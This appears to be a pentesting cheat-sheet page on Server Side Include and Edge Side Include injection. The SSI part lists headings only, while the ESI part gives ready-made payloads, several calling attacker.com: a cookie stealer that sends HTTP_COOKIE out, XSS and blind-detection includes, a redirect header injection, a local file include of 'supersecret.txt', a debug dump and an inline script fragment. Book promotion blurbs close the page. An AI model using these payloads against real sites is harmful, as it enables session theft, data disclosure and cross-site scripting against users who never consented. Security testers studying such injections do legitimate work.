SSI / ESI Injection
Server Side Include Injection
Last updated
Server Side Include Injection
Last updated
Print a date
Print all the variabels
Include a file
Doing a reverse shell
Blind detection
<esi:include src=http://attacker.com>
XSS
<esi:include src=http://attacker.com/XSSPAYLOAD.html>
Cookie stealer
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>
Include a file
<esi:include src="supersecret.txt">
Display debug info
<esi:debug/>
Add header
<!--esi $add_header('Location','http://attacker.com') -->
Inline fragment
<esi:inline name="/attack.html" fetchable="yes"><script>prompt('XSS')</script></esi:inline>
The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.